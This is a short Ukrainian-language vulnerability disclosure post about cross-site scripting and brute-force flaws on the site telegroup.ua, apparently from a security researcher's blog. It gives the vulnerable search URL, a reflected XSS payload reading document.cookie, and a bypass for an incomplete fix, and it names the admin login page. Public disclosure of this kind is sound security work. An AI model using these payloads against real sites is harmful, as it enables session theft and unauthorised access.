Уразливості на www.telegroup.ua

23:53 30.08.2011

10.11.2010

У липні, 25.07.2010, я знайшов Cross-Site Scripting та Brute Force уразливості на сайті http://www.telegroup.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

30.08.2011

XSS:

POST запит на сторінці http://www.telegroup.ua/ru/cms/search
“><script>alert(document.cookie)</script>
В полі пошуку.

Даний варіант атаки вже виправлено. Але неякісно, тому можна використати цей варіант:
“><body onload=alert(document.cookie)>

Brute Force:

http://www.telegroup.ua/admin/

BF уразливість вже виправлена, але XSS досі не виправлена.


2 відповідей на “Уразливості на www.telegroup.ua”

  1. andre каже:

    thanks

  2. MustLive каже:

    andre

    Завжди будь ласка.

Leave a Reply

You must be logged in to post a comment.